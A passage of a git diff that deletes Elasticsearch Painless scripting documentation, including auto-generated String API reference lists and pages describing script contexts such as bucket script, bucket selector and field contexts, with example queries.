{java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/index.asciidoc deleted file mode 100644 index ab62b04bb9d..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-watcher-condition]] -=== Watcher Condition API - -The following specialized API is available in the Watcher Condition context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/packages.asciidoc deleted file mode 100644 index 91df00b419f..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-watcher-condition/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-watcher-condition-java-lang"] -=== Watcher Condition API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-watcher-condition-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/index.asciidoc deleted file mode 100644 index 35610ce0824..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-watcher-transform]] -=== Watcher Transform API - -The following specialized API is available in the Watcher Transform context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/packages.asciidoc deleted file mode 100644 index a220172510b..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-watcher-transform/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-watcher-transform-java-lang"] -=== Watcher Transform API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-watcher-transform-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-api-reference/painless-api-reference-xpack-template/index.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-xpack-template/index.asciidoc deleted file mode 100644 index 47035e9bc17..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-xpack-template/index.asciidoc +++ /dev/null @@ -1,20 +0,0 @@ -// This file is auto-generated. Do not edit. - -[[painless-api-reference-xpack-template]] -=== Xpack Template API - -The following specialized API is available in the Xpack Template context. - -* See the <> for further API available in all contexts. - -==== Classes By Package -The following classes are available grouped by their respective packages. Click on a class to view details about the available methods and fields. - - -==== java.lang -<> - -* <> - -include::packages.asciidoc[] - diff --git a/docs/painless/painless-api-reference/painless-api-reference-xpack-template/packages.asciidoc b/docs/painless/painless-api-reference/painless-api-reference-xpack-template/packages.asciidoc deleted file mode 100644 index ab5d3f78498..00000000000 --- a/docs/painless/painless-api-reference/painless-api-reference-xpack-template/packages.asciidoc +++ /dev/null @@ -1,62 +0,0 @@ -// This file is auto-generated. Do not edit. - - -[role="exclude",id="painless-api-reference-xpack-template-java-lang"] -=== Xpack Template API for package java.lang -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-xpack-template-String]] -==== String -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D)[copyValueOf](char[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#copyValueOf(char%5B%5D,int,int)[copyValueOf](char[], int, int) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.lang.String,java.lang.Object%5B%5D)[format](String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#format(java.util.Locale,java.lang.String,java.lang.Object%5B%5D)[format](Locale, String, def[]) -* static String {java11-javadoc}/java.base/java/lang/String.html#join(java.lang.CharSequence,java.lang.Iterable)[join](CharSequence, Iterable) -* static String {java11-javadoc}/java.base/java/lang/String.html#valueOf(java.lang.Object)[valueOf](def) -* {java11-javadoc}/java.base/java/lang/String.html#()[String]() -* char {java11-javadoc}/java.base/java/lang/CharSequence.html#charAt(int)[charAt](int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#chars()[chars]() -* int {java11-javadoc}/java.base/java/lang/String.html#codePointAt(int)[codePointAt](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointBefore(int)[codePointBefore](int) -* int {java11-javadoc}/java.base/java/lang/String.html#codePointCount(int,int)[codePointCount](int, int) -* IntStream {java11-javadoc}/java.base/java/lang/CharSequence.html#codePoints()[codePoints]() -* int {java11-javadoc}/java.base/java/lang/String.html#compareTo(java.lang.String)[compareTo](String) -* int {java11-javadoc}/java.base/java/lang/String.html#compareToIgnoreCase(java.lang.String)[compareToIgnoreCase](String) -* String {java11-javadoc}/java.base/java/lang/String.html#concat(java.lang.String)[concat](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contains(java.lang.CharSequence)[contains](CharSequence) -* boolean {java11-javadoc}/java.base/java/lang/String.html#contentEquals(java.lang.CharSequence)[contentEquals](CharSequence) -* String decodeBase64() -* String encodeBase64() -* boolean {java11-javadoc}/java.base/java/lang/String.html#endsWith(java.lang.String)[endsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* boolean {java11-javadoc}/java.base/java/lang/String.html#equalsIgnoreCase(java.lang.String)[equalsIgnoreCase](String) -* void {java11-javadoc}/java.base/java/lang/String.html#getChars(int,int,char%5B%5D,int)[getChars](int, int, char[], int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String)[indexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#indexOf(java.lang.String,int)[indexOf](String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#isEmpty()[isEmpty]() -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String)[lastIndexOf](String) -* int {java11-javadoc}/java.base/java/lang/String.html#lastIndexOf(java.lang.String,int)[lastIndexOf](String, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/String.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(int,java.lang.String,int,int)[regionMatches](int, String, int, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#regionMatches(boolean,int,java.lang.String,int,int)[regionMatches](boolean, int, String, int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#replace(java.lang.CharSequence,java.lang.CharSequence)[replace](CharSequence, CharSequence) -* String replaceAll(Pattern, Function) -* String replaceFirst(Pattern, Function) -* String[] splitOnToken(String) -* String[] splitOnToken(String, int) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String)[startsWith](String) -* boolean {java11-javadoc}/java.base/java/lang/String.html#startsWith(java.lang.String,int)[startsWith](String, int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int)[substring](int) -* String {java11-javadoc}/java.base/java/lang/String.html#substring(int,int)[substring](int, int) -* char[] {java11-javadoc}/java.base/java/lang/String.html#toCharArray()[toCharArray]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase()[toLowerCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toLowerCase(java.util.Locale)[toLowerCase](Locale) -* String {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase()[toUpperCase]() -* String {java11-javadoc}/java.base/java/lang/String.html#toUpperCase(java.util.Locale)[toUpperCase](Locale) -* String {java11-javadoc}/java.base/java/lang/String.html#trim()[trim]() - - diff --git a/docs/painless/painless-contexts.asciidoc b/docs/painless/painless-contexts.asciidoc deleted file mode 100644 index de3d96a48d1..00000000000 --- a/docs/painless/painless-contexts.asciidoc +++ /dev/null @@ -1,57 +0,0 @@ -[[painless-contexts]] -== Painless contexts - -A Painless script is evaluated within a context. Each context has values that -are available as local variables, an allowlist that controls the available -classes, and the methods and fields within those classes (API), and -if and what type of value is returned. - -A Painless script is typically executed within one of the contexts in the table -below. Note this is not necessarily a comprehensive list as custom plugins and -specialized code may define new ways to use a Painless script. - -[options="header",cols="<1,<1,<1"] -|==== -| Name | Painless Documentation - | Elasticsearch Documentation -| Ingest processor | <> - | {ref}/script-processor.html[Elasticsearch Documentation] -| Update | <> - | {ref}/docs-update.html[Elasticsearch Documentation] -| Update by query | <> - | {ref}/docs-update-by-query.html[Elasticsearch Documentation] -| Reindex | <> - | {ref}/docs-reindex.html[Elasticsearch Documentation] -| Sort | <> - | {ref}/sort-search-results.html[Elasticsearch Documentation] -| Similarity | <> - | {ref}/index-modules-similarity.html[Elasticsearch Documentation] -| Weight | <> - | {ref}/index-modules-similarity.html[Elasticsearch Documentation] -| Score | <> - | {ref}/query-dsl-function-score-query.html[Elasticsearch Documentation] -| Field | <> - | {ref}/search-fields.html#script-fields[Elasticsearch Documentation] -| Filter | <> - | {ref}/query-dsl-script-query.html[Elasticsearch Documentation] -| Minimum should match | <> - | {ref}/query-dsl-terms-set-query.html[Elasticsearch Documentation] -| Metric aggregation initialization | <> - | {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Elasticsearch Documentation] -| Metric aggregation map | <> - | {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Elasticsearch Documentation] -| Metric aggregation combine | <> - | {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Elasticsearch Documentation] -| Metric aggregation reduce | <> - | {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Elasticsearch Documentation] -| Bucket script aggregation | <> - | {ref}/search-aggregations-pipeline-bucket-script-aggregation.html[Elasticsearch Documentation] -| Bucket selector aggregation | <> - | {ref}/search-aggregations-pipeline-bucket-selector-aggregation.html[Elasticsearch Documentation] -| Watcher condition | <> - | {ref}/condition-script.html[Elasticsearch Documentation] -| Watcher transform | <> - | {ref}/transform-script.html[Elasticsearch Documentation] -|==== - -include::painless-contexts/index.asciidoc[] diff --git a/docs/painless/painless-contexts/index.asciidoc b/docs/painless/painless-contexts/index.asciidoc deleted file mode 100644 index 11b4c999337..00000000000 --- a/docs/painless/painless-contexts/index.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -include::painless-context-examples.asciidoc[] - -include::painless-ingest-processor-context.asciidoc[] - -include::painless-update-context.asciidoc[] - -include::painless-update-by-query-context.asciidoc[] - -include::painless-reindex-context.asciidoc[] - -include::painless-sort-context.asciidoc[] - -include::painless-similarity-context.asciidoc[] - -include::painless-weight-context.asciidoc[] - -include::painless-score-context.asciidoc[] - -include::painless-field-context.asciidoc[] - -include::painless-filter-context.asciidoc[] - -include::painless-min-should-match-context.asciidoc[] - -include::painless-metric-agg-init-context.asciidoc[] - -include::painless-metric-agg-map-context.asciidoc[] - -include::painless-metric-agg-combine-context.asciidoc[] - -include::painless-metric-agg-reduce-context.asciidoc[] - -include::painless-bucket-script-agg-context.asciidoc[] - -include::painless-bucket-selector-agg-context.asciidoc[] - -include::painless-analysis-predicate-context.asciidoc[] - -include::painless-watcher-condition-context.asciidoc[] - -include::painless-watcher-transform-context.asciidoc[] diff --git a/docs/painless/painless-contexts/painless-analysis-predicate-context.asciidoc b/docs/painless/painless-contexts/painless-analysis-predicate-context.asciidoc deleted file mode 100644 index 07914b671e7..00000000000 --- a/docs/painless/painless-contexts/painless-analysis-predicate-context.asciidoc +++ /dev/null @@ -1,43 +0,0 @@ -[[painless-analysis-predicate-context]] -=== Analysis Predicate Context - -Use a painless script to determine whether or not the current token in an -analysis chain matches a predicate. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`token.term` (`CharSequence`, read-only):: - The characters of the current token - -`token.position` (`int`, read-only):: - The position of the current token - -`token.positionIncrement` (`int`, read-only):: - The position increment of the current token - -`token.positionLength` (`int`, read-only):: - The position length of the current token - -`token.startOffset` (`int`, read-only):: - The start offset of the current token - -`token.endOffset` (`int`, read-only):: - The end offset of the current token - -`token.type` (`String`, read-only):: - The type of the current token - -`token.keyword` ('boolean`, read-only):: - Whether or not the current token is marked as a keyword - -*Return* - -`boolean`:: - Whether or not the current token matches the predicate - -*API* - -The standard <> is available. \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-bucket-script-agg-context.asciidoc b/docs/painless/painless-contexts/painless-bucket-script-agg-context.asciidoc deleted file mode 100644 index b97e3057077..00000000000 --- a/docs/painless/painless-contexts/painless-bucket-script-agg-context.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[[painless-bucket-script-agg-context]] -=== Bucket script aggregation context - -Use a Painless script in an -{ref}/search-aggregations-pipeline-bucket-script-aggregation.html[`bucket_script` pipeline aggregation] -to calculate a value as a result in a bucket. - -==== Variables - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. The parameters - include values defined as part of the `buckets_path`. - -==== Return - -numeric:: - The calculated value as the result. - -==== API - -The standard <> is available. - -==== Example - -To run this example, first follow the steps in <>. - -The painless context in a `bucket_script` aggregation provides a `params` map. This map contains both -user-specified custom values, as well as the values from other aggregations specified in the `buckets_path` -property. - -This example takes the values from a min and max aggregation, calculates the difference, -and adds the user-specified base_cost to the result: - -[source,Painless] --------------------------------------------------- -(params.max - params.min) + params.base_cost --------------------------------------------------- - -Note that the values are extracted from the `params` map. In context, the aggregation looks like this: - -[source,console] --------------------------------------------------- -GET /seats/_search -{ - "size": 0, - "aggs": { - "theatres": { - "terms": { - "field": "theatre", - "size": 10 - }, - "aggs": { - "min_cost": { - "min": { - "field": "cost" - } - }, - "max_cost": { - "max": { - "field": "cost" - } - }, - "spread_plus_base": { - "bucket_script": { - "buckets_path": { <1> - "min": "min_cost", - "max": "max_cost" - }, - "script": { - "params": { - "base_cost": 5 <2> - }, - "source": "(params.max - params.min) + params.base_cost" - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:seats] - -<1> The `buckets_path` points to two aggregations (`min_cost`, `max_cost`) and adds `min`/`max` variables -to the `params` map -<2> The user-specified `base_cost` is also added to the script's `params` map \ No newline at end of file diff --git a/docs/painless/painless-contexts/painless-bucket-selector-agg-context.asciidoc b/docs/painless/painless-contexts/painless-bucket-selector-agg-context.asciidoc deleted file mode 100644 index 13fe69cefae..00000000000 --- a/docs/painless/painless-contexts/painless-bucket-selector-agg-context.asciidoc +++ /dev/null @@ -1,81 +0,0 @@ - -[[painless-bucket-selector-agg-context]] -=== Bucket selector aggregation context - -Use a Painless script in an -{ref}/search-aggregations-pipeline-bucket-selector-aggregation.html[`bucket_selector` aggregation] -to determine if a bucket should be retained or filtered out. - -==== Variables - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. The parameters - include values defined as part of the `buckets_path`. - -==== Return - -boolean:: - True if the bucket should be retained, false if the bucket should be filtered out. - -==== API - - -To run this example, first follow the steps in <>. - -The painless context in a `bucket_selector` aggregation provides a `params` map. This map contains both -user-specified custom values, as well as the values from other aggregations specified in the `buckets_path` -property. - -Unlike some other aggregation contexts, the `bucket_selector` context must return a boolean `true` or `false`. - -This example finds the max of each bucket, adds a user-specified base_cost, and retains all of the -buckets that are greater than `10`. - -[source,Painless] --------------------------------------------------- -params.max + params.base_cost > 10 --------------------------------------------------- - -Note that the values are extracted from the `params` map. The script is in the form of an expression -that returns `true` or `false`. In context, the aggregation looks like this: - -[source,console] --------------------------------------------------- -GET /seats/_search -{ - "size": 0, - "aggs": { - "theatres": { - "terms": { - "field": "theatre", - "size": 10 - }, - "aggs": { - "max_cost": { - "max": { - "field": "cost" - } - }, - "filtering_agg": { - "bucket_selector": { - "buckets_path": { <1> - "max": "max_cost" - }, - "script": { - "params": { - "base_cost": 5 <2> - }, - "source": "params.max + params.base_cost > 10" - } - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:seats] - -<1> The `buckets_path` points to the max aggregations (`max_cost`) and adds `max` variables -to the `params` map -<2> The user-specified `base_cost` is also added to the `params` map diff --git a/docs/painless/painless-contexts/painless-context-examples.asciidoc b/docs/painless/painless-contexts/painless-context-examples.asciidoc deleted file mode 100644 index a451b1e89ca..00000000000 --- a/docs/painless/painless-contexts/painless-context-examples.asciidoc +++ /dev/null @@ -1,77 +0,0 @@ -[[painless-context-examples]] -=== Context examples - -To run the examples, index the sample seat data into Elasticsearch. The examples -must be run sequentially to work correctly. - -. Download the -https://download.elastic.co/demos/painless/contexts/seats.json[seat data]. This -data set contains booking information for a collection of plays. Each document -represents a single seat for a play at a particular theater on a specific date -and time. -+ -Each document contains the following fields: -+ -`theatre` ({ref}/keyword.html[`keyword`]):: - The name of the theater the play is in. -`play` ({ref}/text.html[`text`]):: - The name of the play. -`actors` ({ref}/text.html[`text`]):: - A list of actors in the play. -`row` ({ref}/number.html[`integer`]):: - The row of the seat. -`number` ({ref}/number.html[`integer`]):: - The number of the seat within a row. -`cost` ({ref}/number.html[`double`]):: - The cost of the ticket for the seat. -`sold` ({ref}/boolean.html[`boolean`]):: - Whether or not the seat is sold. -`datetime` ({ref}/date.html[`date`]):: - The date and time of the play as a date object. -`date` ({ref}/keyword.html[`keyword`]):: - The date of the play as a keyword. -`time` ({ref}/keyword.html[`keyword`]):: - The time of the play as a keyword. - -. {defguide}/running-elasticsearch.html[Start] Elasticsearch. Note these -examples assume Elasticsearch and Kibana are running locally. To use the Console -editor with a remote Kibana instance, click the settings icon and enter the -Console URL. To submit a cURL request to a remote Elasticsearch instance, edit -the request URL. - -. Create {ref}/mapping.html[mappings] for the sample data: -+ -[source,console] ----- -PUT /seats -{ - "mappings": { - "properties": { - "theatre": { "type": "keyword" }, - "play": { "type": "keyword" }, - "actors": { "type": "text" }, - "row": { "type": "integer" }, - "number": { "type": "integer" }, - "cost": { "type": "double" }, - "sold": { "type": "boolean" }, - "datetime": { "type": "date" }, - "date": { "type": "keyword" }, - "time": { "type": "keyword" } - } - } -} ----- -+ - -. Run the <> -example. This sets up a script ingest processor used on each document as the -seat data is indexed. - -. Index the seat data: -+ -[source,js] ----- -curl -XPOST "localhost:9200/seats/_bulk?pipeline=seats" -H "Content-Type: application/x-ndjson" --data-binary "@//seats.json" ----- -// NOTCONSOLE - diff --git a/docs/painless/painless-contexts/painless-field-context.asciidoc b/docs/painless/painless-contexts/painless-field-context.asciidoc deleted file mode 100644 index 71084b11f2f..00000000000 --- a/docs/painless/painless-contexts/painless-field-context.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[painless-field-context]] -=== Field context - -Use a Painless script to create a -{ref}/search-fields.html#script-fields[script field] to return -a customized value for each document in the results of a query. - -*Variables* - -`params` (`Map`, read-only):: - User-defined parameters passed in as part of the query. - -`doc` (`Map`, read-only):: - Contains the fields of the specified document where each field is a - `List` of values. - -{ref}/mapping-source-field.html[`params['_source']`] (`Map`, read-only):: - Contains extracted JSON in a `Map` and `List` structure for the fields - existing in a stored document. - -*Return* - -`Object`:: - The customized value for each document. - -*API* - -The standard <> is available. - - -*Example* - -To run this example, first follow the steps in -<>. - -You can then use these two example scripts to compute custom information -for each search hit and output it to two new fields. - -The first script gets the doc value for the `datetime` field and calls -the `getDayOfWeek` function to determine the corresponding day of the week. - -[source,Painless] ----- -doc['datetime'].value.getDayOfWeek(); ----- - -The second script calculates the number of actors. Actors' names are stored -as a text array in the `actors` field. - -[source,Painless] ----- -params['_source']['actors'].length; <1> ----- - -<1> By default, doc values are not available for text fields. However, - you can still calculate the number of actors by extracting actors - from `_source`. Note that `params['_source']['actors']` is a list. - - -Submit the following request: - -[source,console] ----- -GET seats/_search -{ - "query": { - "match_all": {} - }, - "script_fields": { - "day-of-week": { - "script": { - "source": "doc['datetime'].value.getDayOfWeek()" - } - }, - "number-of-actors": { - "script": { - "source": "params['_source']['actors'].length" - } - } - } -} ----- -// TEST[skip: requires setup from other pages] \ No newline at end of file diff --git 